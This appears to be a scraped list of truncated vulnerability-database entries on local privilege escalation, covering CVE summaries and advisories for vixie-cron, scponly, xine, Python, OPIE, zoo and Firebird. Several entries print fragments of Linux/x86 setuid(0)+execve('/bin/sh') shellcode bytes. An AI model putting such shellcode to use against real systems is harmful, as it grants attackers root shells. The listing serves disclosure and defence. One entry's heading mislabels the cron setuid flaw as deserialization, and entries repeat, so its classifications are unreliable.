CVE-2006-2607

docommand.c in Vixie cron vixie-cron 4.1 does not check the return code of a setuid call, which might allow local users to gain root privileges if setuid fails in cases such as PAM failures or resource limits, as originally demonstrated by a program that exceeds the process limits as defined in...

CVE-2006-2607

docommand.c in Vixie cron vixie-cron 4.1 does not check the return code of a setuid call, which might allow local users to gain root privileges if setuid fails in cases such as PAM failures or resource limits, as originally demonstrated by a program that exceeds the process limits as defined in...

Deserialization of untrusted data

docommand.c in Vixie cron vixie-cron 4.1 does not check the return code of a setuid call, which might allow local users to gain root privileges if setuid fails in cases such as PAM failures or resource limits, as originally demonstrated by a program that exceeds the process limits as defined in...

CVE-2006-2607

CVE-2006-2607 refers to a local privilege escalation in vixie-cron 4.1 where do_command.c does not check the return value of setuid(), potentially allowing a root gain if setuid() fails (e.g., PAM limits or resource limits). Connected advisories confirm this vulnerability and document patches/ups...

CVE-2006-2607

docommand.c in Vixie cron vixie-cron 4.1 does not check the return code of a setuid call, which might allow local users to gain root privileges if setuid fails in cases such as PAM failures or resource limits, as originally demonstrated by a program that exceeds the process limits as defined in...

CVE-2006-2607

docommand.c in Vixie cron vixie-cron 4.1 does not check the return code of a setuid call, which might allow local users to gain root privileges if setuid fails in cases such as PAM failures or resource limits, as originally demonstrated by a program that exceeds the process limits as defined in...

FreeBSD : scponly -- local privilege escalation exploits (b5a49db7-72fc-11da-9827-021106004fd6)

Max Vozeler reports : If ALL the following conditions are true, administrators using scponly-4.1 or older may be at risk of a local privilege escalation exploit : - the chrooted setuid scponlyc binary is installed - regular non-scponly users have interactive shell access to the box - a user...

Format string

Multiple format string vulnerabilities in xiTK xitk/main.c in xine 0.99.4 might allow attackers to cause a denial of service via format string specifiers in an MP3 filename specified on the command line. NOTE: this is a different vulnerability than CVE-2006-1905. In addition, if the only attack...

CVE-2006-2230

Multiple format string vulnerabilities in xiTK xitk/main.c in xine 0.99.4 might allow attackers to cause a denial of service via format string specifiers in an MP3 filename specified on the command line. NOTE: this is a different vulnerability than CVE-2006-1905. In addition, if the only attack...

linux/x86 setuid(0) + execve(""/bin/sh"" [""/bin/sh"" NULL]) 31 bytes

No description provided by source. / Linux/x86 setuid0 + execve"/bin/sh", "/bin/sh", NULL - 31 bytes - [email protected] / char shellcode = "\x6a\x17" // push $0x17 "\x58" // pop %eax "\x31\xdb" // xor %ebx, %ebx "\xcd\x80" // int $0x80 "\x31\xd2" // xor %edx, %edx "\x6a\x0b" // push $0xb "\x58" /...

linux/x86 setuid(0),setgid(0) execve(/bin/sh, [/bin/sh, NULL]) 37 bytes

Exploit for linux/x86 platform in category shellcode ======================================================================= linux/x86 setuid0,setgid0 execve/bin/sh, /bin/sh, NULL 37 bytes ======================================================================= / Linux/x86 setuid0 + setgid0 +...

linux/x86 - setuid0 + execve"/bin/sh", "/bin/sh", NULL 31 bytes

linux/x86 setuid0 + execve"/bin/sh", "/bin/sh", NULL 31 bytes. Shellcode exploit for linx86 platform / Linux/x86 setuid0 + execve"/bin/sh", "/bin/sh", NULL - 31 bytes - [email protected] / char shellcode = "\x6a\x17" // push $0x17 "\x58" // pop %eax "\x31\xdb" // xor %ebx, %ebx "\xcd\x80" // int...

linux/x86 setuid(0) + execve("/bin/sh", ["/bin/sh", NULL]) 31 bytes

Exploit for linux/x86 platform in category shellcode =================================================================== linux/x86 setuid0 + execve"/bin/sh", "/bin/sh", NULL 31 bytes =================================================================== / Linux/x86 setuid0 + execve"/bin/sh",...

linux/x86 setuid(0) setgid(0) execve(/bin/sh [/bin/sh NULL]) 37 bytes

No description provided by source. / Linux/x86 setuid0 + setgid0 + execve"/bin/sh", "/bin/sh", NULL - 37 bytes - [email protected] / char shellcode = "\x6a\x17" // push $0x17 "\x58" // pop %eax "\x31\xdb" // xor %ebx, %ebx "\xcd\x80" // int $0x80 "\x6a\x2e" // push $0x2e "\x58" // pop %eax "\x53" ...

Stack overflow

Stack-based buffer overflow in Python 2.4.2 and earlier, running on Linux 2.6.12.5 under gcc 4.0.3 with libc 2.3.5, allows local users to cause a "stack overflow," and possibly gain privileges, by running a script from a current working directory that has a long name, related to the realpath...

CVE-2006-1542

Stack-based buffer overflow in Python 2.4.2 and earlier, running on Linux 2.6.12.5 under gcc 4.0.3 with libc 2.3.5, allows local users to cause a "stack overflow," and possibly gain privileges, by running a script from a current working directory that has a long name, related to the realpath...

OPIE -- arbitrary password change

Problem Description The opiepasswd1 program uses getlogin2 to identify the user calling opiepasswd1. In some circumstances getlogin2 will return "root" even when running as an unprivileged user. This causes opiepasswd1 to allow an unpriviled user to configure OPIE authentication for the root user...

Buffer overflow

Buffer overflow in the parse function in parse.c in zoo 2.10 might allow local users to execute arbitrary code via long filename command line arguments, which are not properly handled during archive creation. NOTE: since this issue is local and not setuid, the set of attack scenarios is limited,...

Buffer overflow

Firebird 1.5.2.4731 installs 1 fblockmgr, 2 gdsdrop, and 3 fbinetserver with setuid firebird permissions, which might allow local users to gain privileges via a buffer overflow as identified by CVE-2006-1240, or possibly other vulnerabilities...

Firebird 1.5 - Inet_Server Local Buffer Overflow

Firebird 1.5 - InetServer Local Buffer Overflow source: https://www.securityfocus.com/bid/17077/info Firebird is susceptible to a local buffer-overflow vulnerability. This issue is due to the application's failure to properly check boundaries of user-supplied command-line argument data before...